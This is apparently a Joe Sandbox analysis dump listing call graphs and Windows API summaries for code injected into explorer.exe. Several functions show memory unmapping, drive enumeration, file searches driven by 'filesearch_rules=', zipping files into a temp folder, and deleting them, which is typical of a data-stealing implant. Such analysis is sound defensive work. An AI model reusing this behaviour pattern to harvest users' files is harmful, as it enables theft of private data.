8270->8274 8629 3a89bf 8271->8629 8276 3aa0e0 RtlDeleteCriticalSection 8273->8276 8277 3aa0f3 8273->8277 8275 3a8840 _free 58 API calls 8274->8275 8275->8270 8276->8273 8277->8167 8282 3a84e5 8278->8282 8279 3a852d 8279->8168 8280 3a8840 _free 58 API calls 8280->8282 8281 3a84fe RtlDeleteCriticalSection 8281->8282 8282->8279 8282->8280 8282->8281 8284 3a80de _doexit 58 API calls 8283->8284 8285 3a7fa0 8284->8285 8285->8140 8287 3a7e98 8286->8287 8288 3a7e86 8286->8288 8289 3a8840 _free 58 API calls 8287->8289 8288->8287 8290 3a8840 _free 58 API calls 8288->8290 8291 3a7ea5 8289->8291 8290->8288 8292 3a7ec9 8291->8292 8294 3a8840 _free 58 API calls 8291->8294 8293 3a8840 _free 58 API calls 8292->8293 8295 3a7ed5 8293->8295 8294->8291 8296 3a8840 _free 58 API calls 8295->8296 8297 3a7ee6 8296->8297 8298 3a8840 _free 58 API calls 8297->8298 8299 3a7ef1 8298->8299 8300 3a7f16 RtlEncodePointer 8299->8300 8305 3a8840 _free 58 API calls 8299->8305 8301 3a7f2b 8300->8301 8302 3a7f31 8300->8302 8303 3a8840 _free 58 API calls 8301->8303 8304 3a7f47 8302->8304 8306 3a8840 _free 58 API calls 8302->8306 8303->8302 8307 3a7627 8304->8307 8309 3a8840 _free 58 API calls 8304->8309 8308 3a7f15 8305->8308 8306->8304 8307->8150 8307->8153 8308->8300 8309->8307 8311 3a7663 8310->8311 8312 3a7655 8310->8312 8311->8167 8312->8311 8313 3a7d53 __mtterm 61 API calls 8312->8313 8313->8311 8315 3a7b7a 8314->8315 8321 3a7ba0 8314->8321 8316 3a7b88 8315->8316 8317 3a89de __freeptd TlsGetValue 8315->8317 8318 3a89fd __freeptd TlsSetValue 8316->8318 8317->8316 8319 3a7b98 8318->8319 8632 3a7a38 8319->8632 8321->8167 8335 3aa71b 8322->8335 8324 3a804d __init_pointers __initp_misc_winsig 8336 3aa6e4 RtlEncodePointer 8324->8336 8326 3a8065 __init_pointers 8327 3a8a8d 34 API calls 8326->8327 8327->8185 8329 3aa1ab 8328->8329 8330 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8329->8330 8331 3a7ce7 8329->8331 8330->8329 8331->8188 8332 3a89a1 8331->8332 8333 3a89b8 TlsAlloc 8332->8333 8334 
3a7cfd 8332->8334 8334->8188 8334->8193 8335->8324 8336->8326 8340 3aa1d8 RtlLeaveCriticalSection 8337->8340 8339 3a84dc 8339->8224 8340->8339 8343 3a8605 8341->8343 8346 3a8669 8343->8346 8351 3aac82 8343->8351 8344 3a8586 8344->8243 8344->8246 8345 3aac82 _parse_cmdline 58 API calls 8345->8346 8346->8344 8346->8345 8348 3a95ee 8347->8348 8349 3a95e7 8347->8349 8348->8238 8439 3a993b 8349->8439 8354 3aac28 8351->8354 8357 3a7837 8354->8357 8358 3a7848 8357->8358 8364 3a7895 8357->8364 8365 3a7ba3 8358->8365 8361 3a7875 8361->8364 8385 3a9895 8361->8385 8364->8343 8366 3a7bbb __getptd_noexit 58 API calls 8365->8366 8367 3a7ba9 8366->8367 8368 3a784e 8367->8368 8369 3a7f79 __amsg_exit 58 API calls 8367->8369 8368->8361 8370 3a9513 8368->8370 8369->8368 8371 3a951f __initptd 8370->8371 8372 3a7ba3 __write_nolock 58 API calls 8371->8372 8373 3a9528 8372->8373 8374 3a9557 8373->8374 8375 3a953b 8373->8375 8376 3aa06e __lock 58 API calls 8374->8376 8377 3a7ba3 __write_nolock 58 API calls 8375->8377 8378 3a955e 8376->8378 8383 3a9540 8377->8383 8397 3a9593 8378->8397 8382 3a954e __initptd 8382->8361 8383->8382 8384 3a7f79 __amsg_exit 58 API calls 8383->8384 8384->8382 8386 3a98a1 __initptd 8385->8386 8387 3a7ba3 __write_nolock 58 API calls 8386->8387 8388 3a98ab 8387->8388 8389 3a98bd 8388->8389 8390 3aa06e __lock 58 API calls 8388->8390 8391 3a98cb __initptd 8389->8391 8393 3a7f79 __amsg_exit 58 API calls 8389->8393 8395 3a98db 8390->8395 8391->8364 8392 3a9908 8435 3a9932 8392->8435 8393->8391 8395->8392 8396 3a8840 _free 58 API calls 8395->8396 8396->8392 8398 3a9572 8397->8398 8399 3a959e ___addlocaleref ___removelocaleref 8397->8399 8401 3a958a 8398->8401 8399->8398 8404 3a9319 8399->8404 8434 3aa1d8 RtlLeaveCriticalSection 8401->8434 8403 3a9591 8403->8383 8405 3a9392 8404->8405 8407 3a932e 8404->8407 8406 3a93df 8405->8406 8408 3a8840 _free 58 API calls 8405->8408 8409 3ab143 ___free_lc_time 58 API calls 8406->8409 8411 3a9408 8406->8411 8407->8405 8415 3a8840 
_free 58 API calls 8407->8415 8417 3a935f 8407->8417 8410 3a93b3 8408->8410 8412 3a93fd 8409->8412 8413 3a8840 _free 58 API calls 8410->8413 8416 3a9467 8411->8416 8432 3a8840 58 API calls _free 8411->8432 8414 3a8840 _free 58 API calls 8412->8414 8418 3a93c6 8413->8418 8414->8411 8421 3a9354 8415->8421 8422 3a8840 _free 58 API calls 8416->8422 8423 3a8840 _free 58 API calls 8417->8423 8433 3a937d 8417->8433 8424 3a8840 _free 58 API calls 8418->8424 8419 3a8840 _free 58 API calls 8420 3a9387 8419->8420 8425 3a8840 _free 58 API calls 8420->8425 8426 3aafe0 ___free_lconv_mon 58 API calls 8421->8426 8427 3a946d 8422->8427 8428 3a9372 8423->8428 8429 3a93d4 8424->8429 8425->8405 8426->8417 8427->8398 8430 3ab0dc ___free_lconv_num 58 API calls 8428->8430 8431 3a8840 _free 58 API calls 8429->8431 8430->8433 8431->8406 8432->8411 8433->8419 8434->8403 8438 3aa1d8 RtlLeaveCriticalSection 8435->8438 8437 3a9939 8437->8389 8438->8437 8440 3a9947 __initptd 8439->8440 8441 3a7ba3 __write_nolock 58 API calls 8440->8441 8442 3a994f 8441->8442 8443 3a9895 __setmbcp 58 API calls 8442->8443 8444 3a9959 8443->8444 8464 3a9636 8444->8464 8447 3a8d99 __malloc_crt 58 API calls 8448 3a997b 8447->8448 8449 3a9aa8 __initptd 8448->8449 8471 3a9ae3 8448->8471 8449->8348 8452 3a9ab8 8452->8449 8454 3a8840 _free 58 API calls 8452->8454 8458 3a9acb 8452->8458 8453 3a99b1 8456 3a8840 _free 58 API calls 8453->8456 8457 3a99d1 8453->8457 8454->8458 8455 3a9230 __cftof_l 58 API calls 8455->8449 8456->8457 8457->8449 8459 3aa06e __lock 58 API calls 8457->8459 8458->8455 8461 3a9a00 8459->8461 8460 3a9a8e 8481 3a9aad 8460->8481 8461->8460 8463 3a8840 _free 58 API calls 8461->8463 8463->8460 8465 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8464->8465 8466 3a9646 8465->8466 8467 3a9667 8466->8467 8468 3a9655 GetOEMCP 8466->8468 8469 3a967e 8467->8469 8470 3a966c GetACP 8467->8470 8468->8469 8469->8447 8469->8449 8470->8469 8472 3a9636 getSystemCP 60 API calls 8471->8472 8474 3a9b00 8472->8474 
8473 3a9b07 setSBCS 8475 3aaf32 __cftof_l 6 API calls 8473->8475 8474->8473 8477 3a9b51 IsValidCodePage 8474->8477 8480 3a9b76 _memset __setmbcp_nolock 8474->8480 8476 3a99a2 8475->8476 8476->8452 8476->8453 8477->8473 8478 3a9b63 GetCPInfo 8477->8478 8478->8473 8478->8480 8484 3a9703 GetCPInfo 8480->8484 8550 3aa1d8 RtlLeaveCriticalSection 8481->8550 8483 3a9ab4 8483->8449 8485 3a97e5 8484->8485 8490 3a973b 8484->8490 8487 3aaf32 __cftof_l 6 API calls 8485->8487 8489 3a9891 8487->8489 8489->8473 8494 3ab823 8490->8494 8493 3ab6c7 ___crtLCMapStringA 62 API calls 8493->8485 8495 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8494->8495 8496 3ab834 8495->8496 8504 3ab72b 8496->8504 8499 3ab6c7 8500 3a7837 _LocaleUpdate::_LocaleUpdate 58 API calls 8499->8500 8501 3ab6d8 8500->8501 8521 3ab4c3 8501->8521 8505 3ab752 MultiByteToWideChar 8504->8505 8506 3ab745 8504->8506 8507 3ab777 8505->8507 8510 3ab77e 8505->8510 8506->8505 8508 3aaf32 __cftof_l 6 API calls 8507->8508 8509 3a979c 8508->8509 8509->8499 8512 3aad7b _malloc 58 API calls 8510->8512 8515 3ab7a0 _memset 8510->8515 8511 3ab7dc MultiByteToWideChar 8513 3ab806 8511->8513 8514 3ab7f6 GetStringTypeW 8511->8514 8512->8515 8517 3ab70d 8513->8517 8514->8513 8515->8507 8515->8511 8518 3ab728 8517->8518 8519 3ab717 8517->8519 8518->8507 8519->8518 8520 3a8840 _free 58 API calls 8519->8520 8520->8518 8523 3ab4dc MultiByteToWideChar 8521->8523 8524 3ab53b 8523->8524 8526 3ab542 8523->8526 8525 3aaf32 __cftof_l 6 API calls 8524->8525 8527 3a97bd 8525->8527 8533 3aad7b _malloc 58 API calls 8526->8533 8535 3ab56a 8526->8535 8527->8493 8528 3ab5a1 MultiByteToWideChar 8529 3ab608 8528->8529 8530 3ab5ba 8528->8530 8532 3ab70d __freea 58 API calls 8529->8532 8546 3ad4db 8530->8546 8532->8524 8533->8535 8534 3ab5ce 8534->8529 8536 3ab5e4 8534->8536 8538 3ab610 8534->8538 8535->8524 8535->8528 8536->8529 8537 3ad4db __crtLCMapStringA_stat LCMapStringW 8536->8537 8537->8529 8540 3aad7b _malloc 58 API calls 8538->8540 8544 
3ab638 8538->8544 8539 3ad4db __crtLCMapStringA_stat LCMapStringW 8541 3ab67b 8539->8541 8540->8544 8542 3ab6a3 8541->8542 8545 3ab695 WideCharToMultiByte 8541->8545 8543 3ab70d __freea 58 API calls 8542->8543 8543->8529 8544->8529 8544->8539 8545->8542 8547 3ad4eb 8546->8547 8548 3ad506 __crtLCMapStringA_stat 8546->8548 8547->8534 8549 3ad51d LCMapStringW 8548->8549 8549->8534 8550->8483 8552 3aacb1 8551->8552 8553 3aaca3 8551->8553 8554 3a9230 __cftof_l 58 API calls 8552->8554 8553->8552 8558 3aacc7 8553->8558 8555 3aacb8 8554->8555 8556 3a91c1 __cftof_l 9 API calls 8555->8556 8557 3aacc2 8556->8557 8557->8259 8558->8557 8559 3a9230 __cftof_l 58 API calls 8558->8559 8559->8555 8561 3aa694 RtlEncodePointer 8560->8561 8561->8561 8562 3aa6ae 8561->8562 8562->8266 8566 3aa580 8563->8566 8565 3aa687 8565->8268 8567 3aa58c __initptd 8566->8567 8574 3a80cc 8567->8574 8573 3aa5b3 __initptd 8573->8565 8575 3aa06e __lock 58 API calls 8574->8575 8576 3a80d3 8575->8576 8577 3aa5c4 RtlDecodePointer RtlDecodePointer 8576->8577 8578 3aa5a1 8577->8578 8579 3aa5f1 8577->8579 8588 3aa5be 8578->8588 8579->8578 8591 3ae280 8579->8591 8581 3aa603 8582 3aa654 RtlEncodePointer RtlEncodePointer 8581->8582 8583 3aa628 8581->8583 8598 3a8de0 8581->8598 8582->8578 8583->8578 8585 3a8de0 __realloc_crt 61 API calls 8583->8585 8586 3aa642 RtlEncodePointer 8583->8586 8587 3aa63c 8585->8587 8586->8582 8587->8578 8587->8586 8625 3a80d5 8588->8625 8592 3ae289 8591->8592 8593 3ae29e RtlSizeHeap 8591->8593 8594 3a9230 __cftof_l 58 API calls 8592->8594 8593->8581 8595 3ae28e 8594->8595 8596 3a91c1 __cftof_l 9 API calls 8595->8596 8597 3ae299 8596->8597 8597->8581 8602 3a8de7 8598->8602 8600 3a8e24 8600->8583 8602->8600 8603 3aae0d 8602->8603 8624 3a8d18 Sleep 8602->8624 8604 3aae21 8603->8604 8605 3aae16 8603->8605 8607 3aae29 8604->8607 8615 3aae36 8604->8615 8606 3aad7b _malloc 58 API calls 8605->8606 8608 3aae1e 8606->8608 8609 3a8840 _free 58 API calls 8607->8609 8608->8602 8623 3aae31 
__dosmaperr 8609->8623 8610 3aae6e 8611 3aa6f5 _malloc RtlDecodePointer 8610->8611 8613 3aae74 8611->8613 8612 3aae3e RtlReAllocateHeap 8612->8615 8612->8623 8616 3a9230 __cftof_l 58 API calls 8613->8616 8614 3aae9e 8618 3a9230 __cftof_l 58 API calls 8614->8618 8615->8610 8615->8612 8615->8614 8617 3aa6f5 _malloc RtlDecodePointer 8615->8617 8620 3aae86 8615->8620 8616->8623 8617->8615 8619 3aaea3 GetLastError 8618->8619 8619->8623 8621 3a9230 __cftof_l 58 API calls 8620->8621 8622 3aae8b GetLastError 8621->8622 8622->8623 8623->8602 8624->8602 8628 3aa1d8 RtlLeaveCriticalSection 8625->8628 8627 3a80dc 8627->8573 8628->8627 8630 3a89d2 8629->8630 8631 3a89d6 TlsFree 8629->8631 8630->8270 8631->8270 8634 3a7a44 __initptd 8632->8634 8633 3a7a5d 8637 3a7a6c 8633->8637 8638 3a8840 _free 58 API calls 8633->8638 8634->8633 8635 3a7b4c __initptd 8634->8635 8636 3a8840 _free 58 API calls 8634->8636 8635->8321 8636->8633 8639 3a8840 _free 58 API calls 8637->8639 8641 3a7a7b 8637->8641 8638->8637 8639->8641 8640 3a8840 _free 58 API calls 8642 3a7a8a 8640->8642 8641->8640 8641->8642 8643 3a8840 _free 58 API calls 8642->8643 8645 3a7a99 8642->8645 8643->8645 8644 3a7aa8 8647 3a7ab7 8644->8647 8649 3a8840 _free 58 API calls 8644->8649 8645->8644 8646 3a8840 _free 58 API calls 8645->8646 8646->8644 8648 3a7ac9 8647->8648 8650 3a8840 _free 58 API calls 8647->8650 8651 3aa06e __lock 58 API calls 8648->8651 8649->8647 8650->8648 8654 3a7ad1 8651->8654 8652 3a7af4 8664 3a7b58 8652->8664 8654->8652 8656 3a8840 _free 58 API calls 8654->8656 8656->8652 8657 3aa06e __lock 58 API calls 8662 3a7b08 ___removelocaleref 8657->8662 8658 3a7b39 8667 3a7b64 8658->8667 8661 3a8840 _free 58 API calls 8661->8635 8662->8658 8663 3a9319 ___freetlocinfo 58 API calls 8662->8663 8663->8658 8670 3aa1d8 RtlLeaveCriticalSection 8664->8670 8666 3a7b01 8666->8657 8671 3aa1d8 RtlLeaveCriticalSection 8667->8671 8669 3a7b46 8669->8661 8670->8666 8671->8669 8682 3a1210 VirtualQuery 8672->8682 8675 3a1eca 
8675->8180 8677 3a1ed6 RtlMoveMemory NtUnmapViewOfSection 8685 3a1d43 8677->8685 8679 3a1ef6 8680 3a1f07 8679->8680 8681 3a1ebe ___DllMainCRTStartup 135 API calls 8679->8681 8680->8180 8681->8680 8683 3a1227 8682->8683 8683->8675 8684 3a1000 GetProcessHeap RtlAllocateHeap 8683->8684 8684->8677 8707 3a1000 GetProcessHeap RtlAllocateHeap 8685->8707 8687 3a1d54 8708 3a1000 GetProcessHeap RtlAllocateHeap 8687->8708 8689 3a1d61 wsprintfA 8699 3a1d85 8689->8699 8691 3a1e99 RtlZeroMemory Sleep 8691->8699 8692 3a1185 lstrlen lstrlen ___DllMainCRTStartup 8692->8699 8695 3a1de0 RtlMoveMemory lstrlen 8714 3a1000 GetProcessHeap RtlAllocateHeap 8695->8714 8698 3a1e7b 8721 3a1b5b 8698->8721 8699->8691 8699->8692 8699->8698 8706 3a1011 GetProcessHeap HeapFree VirtualQuery ___DllMainCRTStartup 8699->8706 8709 3a11d1 OpenFileMappingA 8699->8709 8712 3a11fd UnmapViewOfFile FindCloseChangeNotification 8699->8712 8713 3a1000 GetProcessHeap RtlAllocateHeap 8699->8713 8715 3a1185 lstrlen lstrlen 8699->8715 8702 3a1e58 RtlMoveMemory 8705 3a12b6 ___DllMainCRTStartup 2 API calls 8702->8705 8703 3a1e33 RtlMoveMemory 8717 3a12b6 8703->8717 8705->8699 8706->8699 8707->8687 8708->8689 8710 3a11f8 8709->8710 8711 3a11e5 MapViewOfFile 8709->8711 8710->8699 8711->8710 8712->8691 8713->8695 8714->8699 8716 3a11a6 RtlZeroMemory 8715->8716 8716->8702 8716->8703 8718 3a12f5 8717->8718 8720 3a12cb lstrlen RtlMoveMemory 8717->8720 8718->8699 8720->8718 8761 3a1090 8721->8761 8725 3a1b83 GetTempPathW lstrcatW 8769 3a185d 8725->8769 8729 3a1bc2 GetLogicalDriveStringsW 8730 3a1d28 8729->8730 8734 3a1bd8 8729->8734 8732 3a1011 ___DllMainCRTStartup 3 API calls 8730->8732 8731 3a1bdf GetDriveTypeW 8731->8734 8733 3a1d2f 8732->8733 8734->8731 8736 3a1c22 lstrlenW 8734->8736 8773 3a1000 GetProcessHeap RtlAllocateHeap 8734->8773 8736->8731 8738 3a1c34 WaitForMultipleObjects 8736->8738 8737 3a1bfd lstrcatW CreateThread 8737->8736 8910 3a1b37 8737->8910 8739 3a1c4e CloseHandle 8738->8739 8740 3a1c5d wsprintfW 

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003A1210: VirtualQuery.KERNEL32(?,?,0000001C), ref: 003A121D
                            • RtlMoveMemory.NTDLL(00000000,00000001,00000363), ref: 003A1EE2
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000001), ref: 003A1EEB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                            • String ID: `,w
                            • API String ID: 1675517319-1086758147
                            • Opcode ID: 87918958cff38c625818d75a3c4941ac03c8e5bc6c1189bfc24e83617e07db50
                            • Instruction ID: 789deb64421f659cea874571c0839bf353f70994aab6b4a4b53ec1de4c594ea0
                            • Opcode Fuzzy Hash: 87918958cff38c625818d75a3c4941ac03c8e5bc6c1189bfc24e83617e07db50
                            • Instruction Fuzzy Hash: 03E0D8314112106BC657B734EC0DE5B379CEF533A9F108B15F6658E0A1CB308940C250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfA.USER32 ref: 003A1D7C
                              • Part of subcall function 003A11D1: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 003A11DB
                              • Part of subcall function 003A11D1: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000001,003A1D90), ref: 003A11ED
                            • RtlMoveMemory.NTDLL(00000000,00000010,-00000001), ref: 003A1DE5
                            • lstrlen.KERNEL32(00000000), ref: 003A1DEC
                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 003A1E24
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A1E3C
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A1E64
                              • Part of subcall function 003A12B6: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,003A1E71), ref: 003A12E5
                              • Part of subcall function 003A12B6: RtlMoveMemory.NTDLL(0077627C,00000000,00000000), ref: 003A12EE
                            • RtlZeroMemory.NTDLL(00040744), ref: 003A1EA4
                            • Sleep.KERNELBASE(000927C0), ref: 003A1EAF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$Move$FileHeapZerolstrlen$AllocateMappingOpenProcessSleepViewwsprintf
                            • String ID: %s%s$`,w$filesearch_rules=$|:|
                            • API String ID: 893542245-3597873117
                            • Opcode ID: f856670c48acdde524d1cb60d2c7eb5503126db49fe7edad1542bdacbec501be
                            • Instruction ID: ea02809a44a9b783a27b3c28476a2d6ac29eb86aa34c190e3732d470ad477e10
                            • Opcode Fuzzy Hash: f856670c48acdde524d1cb60d2c7eb5503126db49fe7edad1542bdacbec501be
                            • Instruction Fuzzy Hash: 8A3191706047019FD307FF289C89E7E77AEEB86358F010B18FA129B296DFB49D458691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Strings
                            • he CRT more than once.This indicates a bug in your application., xrefs: 003C5ABC
                            Memory Dump Source
                            • Source File: 0000000E.00000002.508709098.00000000003C3000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C3000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3c3000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: he CRT more than once.This indicates a bug in your application.
                            • API String ID: 0-295583550
                            • Opcode ID: 05785816162738bc705982e96bac6a522005c72bac943122fed93a8132833492
                            • Instruction ID: ddec28051146247b93e172e71f6680a85ac930bd851c76ea9b305e2aedfc87d0
                            • Opcode Fuzzy Hash: 05785816162738bc705982e96bac6a522005c72bac943122fed93a8132833492
                            • Instruction Fuzzy Hash: 66A18F71518B924FD7275A788C90BA0BFA4EF53324B2907ADC4E1CB2D7D7A06C86C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 118 3aaab2-3aaabd 119 3aaabf-3aaac4 118->119 120 3aaac6-3aaac8 118->120 121 3aaacc 119->121 122 3aaaca 120->122 123 3aaad1-3aaad4 call 3a8d51 120->123 121->123 122->121 125 3aaad9-3aaae2 123->125 126 3aab02-3aab04 125->126 127 3aaae4-3aaafb call 3a8d51 125->127 128 3aab09-3aab18 126->128 127->126 133 3aaafd-3aab01 127->133 130 3aab1a-3aab1f 128->130 131 3aab21-3aab24 128->131 130->128
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: `;
                            • API String ID: 3494438863-4285419970
                            • Opcode ID: 78b0300a46112b33c32aa4d608218cf33324dd9b9c8ed21734510d76354d13d7
                            • Instruction ID: fba6c1a575883c7866ebfc7814b8c783d5b6d8f4cd1665b2a04c4b1003914a8d
                            • Opcode Fuzzy Hash: 78b0300a46112b33c32aa4d608218cf33324dd9b9c8ed21734510d76354d13d7
                            • Instruction Fuzzy Hash: 23F0CD72608B01AEF71B9F68BD02AB537D9E717728F20523BE700CE1A0EB308C40D691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 147 3a11d1-3a11e3 OpenFileMappingA 148 3a11f8-3a11fc 147->148 149 3a11e5-3a11f5 MapViewOfFile 147->149 149->148
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 003A11DB
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000001,003A1D90), ref: 003A11ED
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: f4a5be54860a7a0ec89f98cc08bb1a9ab3df14a0f83ae3a841de3d3a8300684b
                            • Instruction ID: 04bc9b28bb716e1b25774f0c2446ca68e808128d90360c8caa62f05d818130e0
                            • Opcode Fuzzy Hash: f4a5be54860a7a0ec89f98cc08bb1a9ab3df14a0f83ae3a841de3d3a8300684b
                            • Instruction Fuzzy Hash: D8D0173270A2317BE7311A6A6C0CF836EDDDF86BE1F050125B609D2050D6608800C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 3a11fd-3a120f UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,00000001,003A1E99,00000001), ref: 003A1201
                            • FindCloseChangeNotification.KERNELBASE(?), ref: 003A1208
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 48a01234d4aa09e8453bfc458ac91d9be6de031ed54675aab4f8b038704bbd94
                            • Instruction ID: ada83a1e02f7e7d6e658f5c18bff94d1fd0cf57d76b298a7593bd1d83cee1a31
                            • Opcode Fuzzy Hash: 48a01234d4aa09e8453bfc458ac91d9be6de031ed54675aab4f8b038704bbd94
                            • Instruction Fuzzy Hash: E8B01272005830D787163FA87C4CACF3F1CEF4A3297018340F209812104734080187F4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 151 3a1000-3a1010 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 5cabf05acae98290c7fe86457985137e03243b5c4eadb5cdd62ba36f746b8a70
                            • Instruction ID: 0cb03e2673e3cb8003762dba8e682c869f487883e4f9475d52618aaff1a5ba0d
                            • Opcode Fuzzy Hash: 5cabf05acae98290c7fe86457985137e03243b5c4eadb5cdd62ba36f746b8a70
                            • Instruction Fuzzy Hash: B0A002715505006BDD466BE8AD1DB19371CBB55709F504644B345851509A7455048721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A1090: lstrlen.KERNEL32(?,00000000,?,?,?,003A1AC9), ref: 003A109D
                              • Part of subcall function 003A1090: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,?), ref: 003A10BA
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • GetTempPathW.KERNEL32(00000104,00000000,00000000,00000000,00000000), ref: 003A1B8F
                            • lstrcatW.KERNEL32 ref: 003A1BA1
                              • Part of subcall function 003A185D: RtlZeroMemory.NTDLL(?,0000001E), ref: 003A1874
                              • Part of subcall function 003A185D: lstrlenW.KERNEL32(00000000), ref: 003A1882
                              • Part of subcall function 003A185D: SHFileOperationW.SHELL32(?), ref: 003A189E
                            • CreateDirectoryW.KERNEL32(00000000), ref: 003A1BB5
                            • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 003A1BCA
                            • GetDriveTypeW.KERNEL32(00000000,00000000), ref: 003A1BE0
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 003A1C01
                            • CreateThread.KERNEL32(00000000,00000000,003A1B37,00000000,00000000,00000000), ref: 003A1C17
                            • lstrlenW.KERNEL32(00000000), ref: 003A1C23
                            • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 003A1C3E
                            • CloseHandle.KERNEL32(?), ref: 003A1C52
                            • wsprintfW.USER32 ref: 003A1C69
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A1C88
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 003A1C9B
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1CCA
                            • CloseHandle.KERNEL32(00000000), ref: 003A1D15
                            • DeleteFileW.KERNEL32(?), ref: 003A1D21
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$Createlstrlen$CloseDriveHandleHeaplstrcat$AllocateByteCharDeleteDirectoryLogicalMemoryMultiMultipleObjectsOperationPathProcessReadSizeStringsTempThreadTypeWaitWideZerowsprintf
                            • String ID: %s.zip$`,w
                            • API String ID: 1936918228-1640653526
                            • Opcode ID: 1155b9e7f59d8999b6267fa19639d5f57ee8b8a5ea6ef463cd3eb205b9ab7c86
                            • Instruction ID: a5f429a738d87ec2430843bf35569cf2e62a5bdb5fea5aa3aeed13af5ca34367
                            • Opcode Fuzzy Hash: 1155b9e7f59d8999b6267fa19639d5f57ee8b8a5ea6ef463cd3eb205b9ab7c86
                            • Instruction Fuzzy Hash: 6D51D731500604ABC723BF78EC89F7F7BADEF86759F050629FA12961A1DB358C0187A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfW.USER32 ref: 003A1999
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 003A19A8
